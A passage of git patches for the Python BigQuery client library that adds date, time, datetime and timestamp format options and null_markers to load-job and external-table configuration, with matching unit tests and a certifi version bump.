_make_credentials() http = object() @@ -5735,6 +5736,7 @@ def test_query_and_wait_defaults(self): self.assertIsNone(rows.location) self.assertEqual(rows.query, query) self.assertEqual(rows.total_bytes_processed, 1234) + self.assertEqual(rows.slot_millis, 5678) # Verify the request we send is to jobs.query. conn.api_request.assert_called_once() diff --git a/tests/unit/test_query.py b/tests/unit/test_query.py index 0d967bdb8..2b704d3c9 100644 --- a/tests/unit/test_query.py +++ b/tests/unit/test_query.py @@ -2000,6 +2000,22 @@ def test_total_bytes_processed_present_string(self): query = self._make_one(resource) self.assertEqual(query.total_bytes_processed, 123456) + def test_slot_millis_missing(self): + query = self._make_one(self._make_resource()) + self.assertIsNone(query.slot_millis) + + def test_slot_millis_present_integer(self): + resource = self._make_resource() + resource["totalSlotMs"] = 123456 + query = self._make_one(resource) + self.assertEqual(query.slot_millis, 123456) + + def test_slot_millis_present_string(self): + resource = self._make_resource() + resource["totalSlotMs"] = "123456" + query = self._make_one(resource) + self.assertEqual(query.slot_millis, 123456) + def test_num_dml_affected_rows_missing(self): query = self._make_one(self._make_resource()) self.assertIsNone(query.num_dml_affected_rows) From 7d3182802deccfceb0646b87fc8d12275d0a569b Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 11 Jul 2025 20:29:28 -0400 Subject: [PATCH 144/202] feat: adds date_format to load job and external config (#2231) * feat: adds date_format to load job and external config * adds date_format to new to/from_api_repr tests --- google/cloud/bigquery/external_config.py | 14 ++++++++++++++ google/cloud/bigquery/job/load.py | 20 ++++++++++++++++++++ tests/unit/job/test_load.py | 14 +++++++++----- tests/unit/job/test_load_config.py | 19 +++++++++++++++++++ tests/unit/test_external_config.py | 7 +++++-- 5 files changed, 67 insertions(+), 7 deletions(-) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index fcfcaca20..54b7bf396 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -848,6 +848,20 @@ def schema(self, value): prop = {"fields": [field.to_api_repr() for field in value]} self._properties["schema"] = prop + @property + def date_format(self) -> Optional[str]: + """Optional[str]: Format used to parse DATE values. Supports C-style and SQL-style values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.date_format + """ + result = self._properties.get("dateFormat") + return typing.cast(str, result) + + @date_format.setter + def date_format(self, value: Optional[str]): + self._properties["dateFormat"] = value + @property def time_zone(self) -> Optional[str]: """Optional[str]: Time zone used when parsing timestamp values that do not diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 5d49aef18..277478d81 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -548,6 +548,19 @@ def source_format(self): def source_format(self, value): self._set_sub_prop("sourceFormat", value) + @property + def date_format(self) -> Optional[str]: + """Optional[str]: Date format used for parsing DATE values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.date_format + """ + return self._get_sub_prop("dateFormat") + + @date_format.setter + def date_format(self, value: Optional[str]): + self._set_sub_prop("dateFormat", value) + @property def time_zone(self) -> Optional[str]: """Optional[str]: Default time zone that will apply when parsing timestamp @@ -903,6 +916,13 @@ def clustering_fields(self): """ return self.configuration.clustering_fields + @property + def date_format(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.date_format`. + """ + return self.configuration.date_format + @property def time_zone(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 81d8e44b4..82baa03c7 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -37,14 +37,14 @@ def _setUpConstants(self): self.OUTPUT_BYTES = 23456 self.OUTPUT_ROWS = 345 self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" - + self.DATE_FORMAT = "%Y-%m-%d" self.TIME_ZONE = "UTC" def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) config = resource["configuration"]["load"] config["sourceUris"] = [self.SOURCE1] - + config["dateFormat"] = self.DATE_FORMAT config["timeZone"] = self.TIME_ZONE config["destinationTable"] = { "projectId": self.PROJECT, @@ -147,7 +147,6 @@ def _verifyResourceProperties(self, job, resource): ) else: self.assertIsNone(job.reference_file_schema_uri) - if "destinationEncryptionConfiguration" in config: self.assertIsNotNone(job.destination_encryption_configuration) self.assertEqual( @@ -156,6 +155,10 @@ def _verifyResourceProperties(self, job, resource): ) else: self.assertIsNone(job.destination_encryption_configuration) + if "dateFormat" in config: + self.assertEqual(job.date_format, config["dateFormat"]) + else: + self.assertIsNone(job.date_format) if "timeZone" in config: self.assertEqual(job.time_zone, config["timeZone"]) else: @@ -202,7 +205,7 @@ def test_ctor(self): self.assertIsNone(job.clustering_fields) self.assertIsNone(job.schema_update_options) self.assertIsNone(job.reference_file_schema_uri) - + self.assertIsNone(job.date_format) self.assertIsNone(job.time_zone) def test_ctor_w_config(self): @@ -599,6 +602,7 @@ def test_begin_w_alternate_client(self): ] }, "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], + "dateFormat": self.DATE_FORMAT, "timeZone": self.TIME_ZONE, } RESOURCE["configuration"]["load"] = LOAD_CONFIGURATION @@ -628,7 +632,7 @@ def test_begin_w_alternate_client(self): config.write_disposition = WriteDisposition.WRITE_TRUNCATE config.schema_update_options = [SchemaUpdateOption.ALLOW_FIELD_ADDITION] config.reference_file_schema_uri = "gs://path/to/reference" - + config.date_format = self.DATE_FORMAT config.time_zone = self.TIME_ZONE with mock.patch( diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 6424f7e68..5b7f8175b 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -828,6 +828,22 @@ def test_write_disposition_setter(self): config._properties["load"]["writeDisposition"], write_disposition ) + def test_date_format_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.date_format) + + def test_date_format_hit(self): + date_format = "%Y-%m-%d" + config = self._get_target_class()() + config._properties["load"]["dateFormat"] = date_format + self.assertEqual(config.date_format, date_format) + + def test_date_format_setter(self): + date_format = "YYYY/MM/DD" + config = self._get_target_class()() + config.date_format = date_format + self.assertEqual(config._properties["load"]["dateFormat"], date_format) + def test_time_zone_missing(self): config = self._get_target_class()() self.assertIsNone(config.time_zone) @@ -942,6 +958,7 @@ def test_column_name_character_map_none(self): }, "useAvroLogicalTypes": True, "writeDisposition": "WRITE_TRUNCATE", + "dateFormat": "%Y-%m-%d", "timeZone": "America/New_York", "parquetOptions": {"enableListInference": True}, "columnNameCharacterMap": "V2", @@ -983,6 +1000,7 @@ def test_from_api_repr(self): ) self.assertTrue(config.use_avro_logical_types) self.assertEqual(config.write_disposition, WriteDisposition.WRITE_TRUNCATE) + self.assertEqual(config.date_format, "%Y-%m-%d") self.assertEqual(config.time_zone, "America/New_York") self.assertTrue(config.parquet_options.enable_list_inference) self.assertEqual(config.column_name_character_map, ColumnNameCharacterMap.V2) @@ -1017,6 +1035,7 @@ def test_to_api_repr(self): ) config.use_avro_logical_types = True config.write_disposition = WriteDisposition.WRITE_TRUNCATE + config.date_format = "%Y-%m-%d" config.time_zone = "America/New_York" parquet_options = ParquetOptions() parquet_options.enable_list_inference = True diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index a89b7a1fb..0f5d09504 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -25,7 +25,7 @@ class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] - + DATE_FORMAT = "MM/DD/YYYY" TIME_ZONE = "America/Los_Angeles" BASE_RESOURCE = { @@ -35,6 +35,7 @@ class TestExternalConfig(unittest.TestCase): "autodetect": True, "ignoreUnknownValues": False, "compression": "compression", + "dateFormat": DATE_FORMAT, "timeZone": TIME_ZONE, } @@ -82,6 +83,7 @@ def test_to_api_repr_base(self): ec.connection_id = "path/to/connection" ec.schema = [schema.SchemaField("full_name", "STRING", mode="REQUIRED")] + ec.date_format = self.DATE_FORMAT ec.time_zone = self.TIME_ZONE exp_schema = { "fields": [{"name": "full_name", "type": "STRING", "mode": "REQUIRED"}] @@ -96,6 +98,7 @@ def test_to_api_repr_base(self): "compression": "compression", "connectionId": "path/to/connection", "schema": exp_schema, + "dateFormat": self.DATE_FORMAT, "timeZone": self.TIME_ZONE, } self.assertEqual(got_resource, exp_resource) @@ -132,7 +135,7 @@ def _verify_base(self, ec): self.assertEqual(ec.ignore_unknown_values, False) self.assertEqual(ec.max_bad_records, 17) self.assertEqual(ec.source_uris, self.SOURCE_URIS) - + self.assertEqual(ec.date_format, self.DATE_FORMAT) self.assertEqual(ec.time_zone, self.TIME_ZONE) def test_to_api_repr_source_format(self): From 371ad292df537278767dba71d81822ed57dd8e7d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 14 Jul 2025 12:14:58 -0400 Subject: [PATCH 145/202] feat: adds time_format and timestamp_format and associated tests (#2238) --- google/cloud/bigquery/external_config.py | 28 +++++++++++++++++ google/cloud/bigquery/job/load.py | 40 ++++++++++++++++++++++++ tests/unit/job/test_load.py | 20 ++++++++++++ tests/unit/job/test_load_config.py | 34 ++++++++++++++++++++ tests/unit/test_external_config.py | 11 +++++++ 5 files changed, 133 insertions(+) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 54b7bf396..370f62c0a 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -879,6 +879,34 @@ def time_zone(self) -> Optional[str]: def time_zone(self, value: Optional[str]): self._properties["timeZone"] = value + @property + def time_format(self) -> Optional[str]: + """Optional[str]: Format used to parse TIME values. Supports C-style and SQL-style values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.time_format + """ + result = self._properties.get("timeFormat") + return typing.cast(str, result) + + @time_format.setter + def time_format(self, value: Optional[str]): + self._properties["timeFormat"] = value + + @property + def timestamp_format(self) -> Optional[str]: + """Optional[str]: Format used to parse TIMESTAMP values. Supports C-style and SQL-style values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.timestamp_format + """ + result = self._properties.get("timestampFormat") + return typing.cast(str, result) + + @timestamp_format.setter + def timestamp_format(self, value: Optional[str]): + self._properties["timestampFormat"] = value + @property def connection_id(self): """Optional[str]: [Experimental] ID of a BigQuery Connection API diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 277478d81..2e5a9a9bb 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -575,6 +575,32 @@ def time_zone(self) -> Optional[str]: def time_zone(self, value: Optional[str]): self._set_sub_prop("timeZone", value) + @property + def time_format(self) -> Optional[str]: + """Optional[str]: Date format used for parsing TIME values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.time_format + """ + return self._get_sub_prop("timeFormat") + + @time_format.setter + def time_format(self, value: Optional[str]): + self._set_sub_prop("timeFormat", value) + + @property + def timestamp_format(self) -> Optional[str]: + """Optional[str]: Date format used for parsing TIMESTAMP values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.timestamp_format + """ + return self._get_sub_prop("timestampFormat") + + @timestamp_format.setter + def timestamp_format(self, value: Optional[str]): + self._set_sub_prop("timestampFormat", value) + @property def time_partitioning(self): """Optional[google.cloud.bigquery.table.TimePartitioning]: Specifies time-based @@ -930,6 +956,20 @@ def time_zone(self): """ return self.configuration.time_zone + @property + def time_format(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.time_format`. + """ + return self.configuration.time_format + + @property + def timestamp_format(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.timestamp_format`. + """ + return self.configuration.timestamp_format + @property def schema_update_options(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 82baa03c7..77adf0cc8 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -39,6 +39,8 @@ def _setUpConstants(self): self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" self.DATE_FORMAT = "%Y-%m-%d" self.TIME_ZONE = "UTC" + self.TIME_FORMAT = "%H:%M:%S" + self.TIMESTAMP_FORMAT = "YYYY-MM-DD HH:MM:SS.SSSSSSZ" def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) @@ -46,6 +48,9 @@ def _make_resource(self, started=False, ended=False): config["sourceUris"] = [self.SOURCE1] config["dateFormat"] = self.DATE_FORMAT config["timeZone"] = self.TIME_ZONE + config["timeFormat"] = self.TIME_FORMAT + config["timestampFormat"] = self.TIMESTAMP_FORMAT + config["destinationTable"] = { "projectId": self.PROJECT, "datasetId": self.DS_ID, @@ -163,6 +168,14 @@ def _verifyResourceProperties(self, job, resource): self.assertEqual(job.time_zone, config["timeZone"]) else: self.assertIsNone(job.time_zone) + if "timeFormat" in config: + self.assertEqual(job.time_format, config["timeFormat"]) + else: + self.assertIsNone(job.time_format) + if "timestampFormat" in config: + self.assertEqual(job.timestamp_format, config["timestampFormat"]) + else: + self.assertIsNone(job.timestamp_format) def test_ctor(self): client = _make_client(project=self.PROJECT) @@ -207,6 +220,8 @@ def test_ctor(self): self.assertIsNone(job.reference_file_schema_uri) self.assertIsNone(job.date_format) self.assertIsNone(job.time_zone) + self.assertIsNone(job.time_format) + self.assertIsNone(job.timestamp_format) def test_ctor_w_config(self): from google.cloud.bigquery.schema import SchemaField @@ -604,7 +619,10 @@ def test_begin_w_alternate_client(self): "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], "dateFormat": self.DATE_FORMAT, "timeZone": self.TIME_ZONE, + "timeFormat": self.TIME_FORMAT, + "timestampFormat": self.TIMESTAMP_FORMAT, } + RESOURCE["configuration"]["load"] = LOAD_CONFIGURATION conn1 = make_connection() client1 = _make_client(project=self.PROJECT, connection=conn1) @@ -634,6 +652,8 @@ def test_begin_w_alternate_client(self): config.reference_file_schema_uri = "gs://path/to/reference" config.date_format = self.DATE_FORMAT config.time_zone = self.TIME_ZONE + config.time_format = self.TIME_FORMAT + config.timestamp_format = self.TIMESTAMP_FORMAT with mock.patch( "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index 5b7f8175b..b733bdda0 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -860,6 +860,40 @@ def test_time_zone_setter(self): config.time_zone = time_zone self.assertEqual(config._properties["load"]["timeZone"], time_zone) + def test_time_format_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.time_format) + + def test_time_format_hit(self): + time_format = "%H:%M:%S" + config = self._get_target_class()() + config._properties["load"]["timeFormat"] = time_format + self.assertEqual(config.time_format, time_format) + + def test_time_format_setter(self): + time_format = "HH24:MI:SS" + config = self._get_target_class()() + config.time_format = time_format + self.assertEqual(config._properties["load"]["timeFormat"], time_format) + + def test_timestamp_format_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.timestamp_format) + + def test_timestamp_format_hit(self): + timestamp_format = "%Y-%m-%dT%H:%M:%S.%fZ" + config = self._get_target_class()() + config._properties["load"]["timestampFormat"] = timestamp_format + self.assertEqual(config.timestamp_format, timestamp_format) + + def test_timestamp_format_setter(self): + timestamp_format = "YYYY/MM/DD HH24:MI:SS.FF6 TZR" + config = self._get_target_class()() + config.timestamp_format = timestamp_format + self.assertEqual( + config._properties["load"]["timestampFormat"], timestamp_format + ) + def test_parquet_options_missing(self): config = self._get_target_class()() self.assertIsNone(config.parquet_options) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 0f5d09504..8b41cd8e3 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -27,6 +27,8 @@ class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] DATE_FORMAT = "MM/DD/YYYY" TIME_ZONE = "America/Los_Angeles" + TIME_FORMAT = "HH24:MI:SS" + TIMESTAMP_FORMAT = "MM/DD/YYYY HH24:MI:SS.FF6 TZR" BASE_RESOURCE = { "sourceFormat": "", @@ -37,6 +39,8 @@ class TestExternalConfig(unittest.TestCase): "compression": "compression", "dateFormat": DATE_FORMAT, "timeZone": TIME_ZONE, + "timeFormat": TIME_FORMAT, + "timestampFormat": TIMESTAMP_FORMAT, } def test_from_api_repr_base(self): @@ -85,6 +89,9 @@ def test_to_api_repr_base(self): ec.date_format = self.DATE_FORMAT ec.time_zone = self.TIME_ZONE + ec.time_format = self.TIME_FORMAT + ec.timestamp_format = self.TIMESTAMP_FORMAT + exp_schema = { "fields": [{"name": "full_name", "type": "STRING", "mode": "REQUIRED"}] } @@ -100,6 +107,8 @@ def test_to_api_repr_base(self): "schema": exp_schema, "dateFormat": self.DATE_FORMAT, "timeZone": self.TIME_ZONE, + "timeFormat": self.TIME_FORMAT, + "timestampFormat": self.TIMESTAMP_FORMAT, } self.assertEqual(got_resource, exp_resource) @@ -137,6 +146,8 @@ def _verify_base(self, ec): self.assertEqual(ec.source_uris, self.SOURCE_URIS) self.assertEqual(ec.date_format, self.DATE_FORMAT) self.assertEqual(ec.time_zone, self.TIME_ZONE) + self.assertEqual(ec.time_format, self.TIME_FORMAT) + self.assertEqual(ec.timestamp_format, self.TIMESTAMP_FORMAT) def test_to_api_repr_source_format(self): ec = external_config.ExternalConfig("CSV") From 54d3dc66244d50a031e3c80d43d372d2743ecbc3 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 15 Jul 2025 05:22:44 -0400 Subject: [PATCH 146/202] feat: adds datetime_format as an option (#2236) * feat: adds datetime_format as an option * updates docstrings --- google/cloud/bigquery/external_config.py | 15 +++++++++++++++ google/cloud/bigquery/job/load.py | 20 ++++++++++++++++++++ tests/unit/job/test_load.py | 9 +++++++++ tests/unit/job/test_load_config.py | 16 ++++++++++++++++ tests/unit/test_external_config.py | 5 +++++ 5 files changed, 65 insertions(+) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 370f62c0a..82c6a9e75 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -862,6 +862,21 @@ def date_format(self) -> Optional[str]: def date_format(self, value: Optional[str]): self._properties["dateFormat"] = value + @property + def datetime_format(self) -> Optional[str]: + """Optional[str]: Format used to parse DATETIME values. Supports C-style + and SQL-style values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.datetime_format + """ + result = self._properties.get("datetimeFormat") + return typing.cast(str, result) + + @datetime_format.setter + def datetime_format(self, value: Optional[str]): + self._properties["datetimeFormat"] = value + @property def time_zone(self) -> Optional[str]: """Optional[str]: Time zone used when parsing timestamp values that do not diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 2e5a9a9bb..3be914f43 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -561,6 +561,19 @@ def date_format(self) -> Optional[str]: def date_format(self, value: Optional[str]): self._set_sub_prop("dateFormat", value) + @property + def datetime_format(self) -> Optional[str]: + """Optional[str]: Date format used for parsing DATETIME values. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.datetime_format + """ + return self._get_sub_prop("datetimeFormat") + + @datetime_format.setter + def datetime_format(self, value: Optional[str]): + self._set_sub_prop("datetimeFormat", value) + @property def time_zone(self) -> Optional[str]: """Optional[str]: Default time zone that will apply when parsing timestamp @@ -949,6 +962,13 @@ def date_format(self): """ return self.configuration.date_format + @property + def datetime_format(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.datetime_format`. + """ + return self.configuration.datetime_format + @property def time_zone(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 77adf0cc8..7afe9cba6 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -38,6 +38,7 @@ def _setUpConstants(self): self.OUTPUT_ROWS = 345 self.REFERENCE_FILE_SCHEMA_URI = "gs://path/to/reference" self.DATE_FORMAT = "%Y-%m-%d" + self.DATETIME_FORMAT = "%Y-%m-%dT%H:%M:%S" self.TIME_ZONE = "UTC" self.TIME_FORMAT = "%H:%M:%S" self.TIMESTAMP_FORMAT = "YYYY-MM-DD HH:MM:SS.SSSSSSZ" @@ -47,6 +48,7 @@ def _make_resource(self, started=False, ended=False): config = resource["configuration"]["load"] config["sourceUris"] = [self.SOURCE1] config["dateFormat"] = self.DATE_FORMAT + config["datetimeFormat"] = self.DATETIME_FORMAT config["timeZone"] = self.TIME_ZONE config["timeFormat"] = self.TIME_FORMAT config["timestampFormat"] = self.TIMESTAMP_FORMAT @@ -164,6 +166,10 @@ def _verifyResourceProperties(self, job, resource): self.assertEqual(job.date_format, config["dateFormat"]) else: self.assertIsNone(job.date_format) + if "datetimeFormat" in config: + self.assertEqual(job.datetime_format, config["datetimeFormat"]) + else: + self.assertIsNone(job.datetime_format) if "timeZone" in config: self.assertEqual(job.time_zone, config["timeZone"]) else: @@ -219,6 +225,7 @@ def test_ctor(self): self.assertIsNone(job.schema_update_options) self.assertIsNone(job.reference_file_schema_uri) self.assertIsNone(job.date_format) + self.assertIsNone(job.datetime_format) self.assertIsNone(job.time_zone) self.assertIsNone(job.time_format) self.assertIsNone(job.timestamp_format) @@ -618,6 +625,7 @@ def test_begin_w_alternate_client(self): }, "schemaUpdateOptions": [SchemaUpdateOption.ALLOW_FIELD_ADDITION], "dateFormat": self.DATE_FORMAT, + "datetimeFormat": self.DATETIME_FORMAT, "timeZone": self.TIME_ZONE, "timeFormat": self.TIME_FORMAT, "timestampFormat": self.TIMESTAMP_FORMAT, @@ -651,6 +659,7 @@ def test_begin_w_alternate_client(self): config.schema_update_options = [SchemaUpdateOption.ALLOW_FIELD_ADDITION] config.reference_file_schema_uri = "gs://path/to/reference" config.date_format = self.DATE_FORMAT + config.datetime_format = self.DATETIME_FORMAT config.time_zone = self.TIME_ZONE config.time_format = self.TIME_FORMAT config.timestamp_format = self.TIMESTAMP_FORMAT diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index b733bdda0..dbb062486 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -844,6 +844,22 @@ def test_date_format_setter(self): config.date_format = date_format self.assertEqual(config._properties["load"]["dateFormat"], date_format) + def test_datetime_format_missing(self): + config = self._get_target_class()() + self.assertIsNone(config.datetime_format) + + def test_datetime_format_hit(self): + datetime_format = "%Y-%m-%dT%H:%M:%S" + config = self._get_target_class()() + config._properties["load"]["datetimeFormat"] = datetime_format + self.assertEqual(config.datetime_format, datetime_format) + + def test_datetime_format_setter(self): + datetime_format = "YYYY/MM/DD HH24:MI:SS" + config = self._get_target_class()() + config.datetime_format = datetime_format + self.assertEqual(config._properties["load"]["datetimeFormat"], datetime_format) + def test_time_zone_missing(self): config = self._get_target_class()() self.assertIsNone(config.time_zone) diff --git a/tests/unit/test_external_config.py b/tests/unit/test_external_config.py index 8b41cd8e3..3a441d1f5 100644 --- a/tests/unit/test_external_config.py +++ b/tests/unit/test_external_config.py @@ -26,6 +26,7 @@ class TestExternalConfig(unittest.TestCase): SOURCE_URIS = ["gs://foo", "gs://bar"] DATE_FORMAT = "MM/DD/YYYY" + DATETIME_FORMAT = "MM/DD/YYYY HH24:MI:SS" TIME_ZONE = "America/Los_Angeles" TIME_FORMAT = "HH24:MI:SS" TIMESTAMP_FORMAT = "MM/DD/YYYY HH24:MI:SS.FF6 TZR" @@ -38,6 +39,7 @@ class TestExternalConfig(unittest.TestCase): "ignoreUnknownValues": False, "compression": "compression", "dateFormat": DATE_FORMAT, + "datetimeFormat": DATETIME_FORMAT, "timeZone": TIME_ZONE, "timeFormat": TIME_FORMAT, "timestampFormat": TIMESTAMP_FORMAT, @@ -88,6 +90,7 @@ def test_to_api_repr_base(self): ec.schema = [schema.SchemaField("full_name", "STRING", mode="REQUIRED")] ec.date_format = self.DATE_FORMAT + ec.datetime_format = self.DATETIME_FORMAT ec.time_zone = self.TIME_ZONE ec.time_format = self.TIME_FORMAT ec.timestamp_format = self.TIMESTAMP_FORMAT @@ -106,6 +109,7 @@ def test_to_api_repr_base(self): "connectionId": "path/to/connection", "schema": exp_schema, "dateFormat": self.DATE_FORMAT, + "datetimeFormat": self.DATETIME_FORMAT, "timeZone": self.TIME_ZONE, "timeFormat": self.TIME_FORMAT, "timestampFormat": self.TIMESTAMP_FORMAT, @@ -145,6 +149,7 @@ def _verify_base(self, ec): self.assertEqual(ec.max_bad_records, 17) self.assertEqual(ec.source_uris, self.SOURCE_URIS) self.assertEqual(ec.date_format, self.DATE_FORMAT) + self.assertEqual(ec.datetime_format, self.DATETIME_FORMAT) self.assertEqual(ec.time_zone, self.TIME_ZONE) self.assertEqual(ec.time_format, self.TIME_FORMAT) self.assertEqual(ec.timestamp_format, self.TIMESTAMP_FORMAT) From 69a2c2bfd89914605d53aefc78bd6e45c38c578f Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 15 Jul 2025 11:43:28 +0200 Subject: [PATCH 147/202] chore(deps): update dependency certifi to v2025.7.14 (#2237) Co-authored-by: Chalmer Lowe --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 447e92c81..e932625b8 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,5 +1,5 @@ attrs==25.3.0 -certifi==2025.7.9 +certifi==2025.7.14 cffi==1.17.1 charset-normalizer==3.4.2 click===8.1.8; python_version == '3.9' From 289446dd8c356d11a0b63b8e6275629b1ae5dc08 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 15 Jul 2025 14:32:47 -0400 Subject: [PATCH 148/202] feat: Add null_markers property to LoadJobConfig and CSVOptions (#2239) * feat: Add null_markers property to LoadJobConfig and CSVOptions * feat: adds null_markers as a load and external_config option --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/external_config.py | 21 ++++++++++++++++++ google/cloud/bigquery/job/load.py | 28 ++++++++++++++++++++++++ tests/unit/job/test_load.py | 7 ++++++ tests/unit/job/test_load_config.py | 16 ++++++++++++++ tests/unit/test_external_config.py | 4 ++++ 5 files changed, 76 insertions(+) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 82c6a9e75..69ed72bc9 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -474,6 +474,27 @@ def skip_leading_rows(self): def skip_leading_rows(self, value): self._properties["skipLeadingRows"] = str(value) + @property + def null_markers(self) -> Optional[Iterable[str]]: + """Optional[Iterable[str]]: A list of strings represented as SQL NULL values in a CSV file. + + .. note:: + null_marker and null_markers can't be set at the same time. + If null_marker is set, null_markers has to be not set. + If null_markers is set, null_marker has to be not set. + If both null_marker and null_markers are set at the same time, a user error would be thrown. + Any strings listed in null_markers, including empty string would be interpreted as SQL NULL. + This applies to all column types. + + See + https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#CsvOptions.FIELDS.null_markers + """ + return self._properties.get("nullMarkers") + + @null_markers.setter + def null_markers(self, value: Optional[Iterable[str]]): + self._properties["nullMarkers"] = value + def to_api_repr(self) -> dict: """Build an API representation of this object. diff --git a/google/cloud/bigquery/job/load.py b/google/cloud/bigquery/job/load.py index 3be914f43..eabc12cfc 100644 --- a/google/cloud/bigquery/job/load.py +++ b/google/cloud/bigquery/job/load.py @@ -386,6 +386,27 @@ def null_marker(self): def null_marker(self, value): self._set_sub_prop("nullMarker", value) + @property + def null_markers(self) -> Optional[List[str]]: + """Optional[List[str]]: A list of strings represented as SQL NULL values in a CSV file. + + .. note:: + null_marker and null_markers can't be set at the same time. + If null_marker is set, null_markers has to be not set. + If null_markers is set, null_marker has to be not set. + If both null_marker and null_markers are set at the same time, a user error would be thrown. + Any strings listed in null_markers, including empty string would be interpreted as SQL NULL. + This applies to all column types. + + See: + https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationLoad.FIELDS.null_markers + """ + return self._get_sub_prop("nullMarkers") + + @null_markers.setter + def null_markers(self, value: Optional[List[str]]): + self._set_sub_prop("nullMarkers", value) + @property def preserve_ascii_control_characters(self): """Optional[bool]: Preserves the embedded ASCII control characters when sourceFormat is set to CSV. @@ -854,6 +875,13 @@ def null_marker(self): """ return self.configuration.null_marker + @property + def null_markers(self): + """See + :attr:`google.cloud.bigquery.job.LoadJobConfig.null_markers`. + """ + return self.configuration.null_markers + @property def quote_character(self): """See diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 7afe9cba6..5d52401c9 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -42,6 +42,7 @@ def _setUpConstants(self): self.TIME_ZONE = "UTC" self.TIME_FORMAT = "%H:%M:%S" self.TIMESTAMP_FORMAT = "YYYY-MM-DD HH:MM:SS.SSSSSSZ" + self.NULL_MARKERS = ["", "NA"] def _make_resource(self, started=False, ended=False): resource = super(TestLoadJob, self)._make_resource(started, ended) @@ -52,6 +53,7 @@ def _make_resource(self, started=False, ended=False): config["timeZone"] = self.TIME_ZONE config["timeFormat"] = self.TIME_FORMAT config["timestampFormat"] = self.TIMESTAMP_FORMAT + 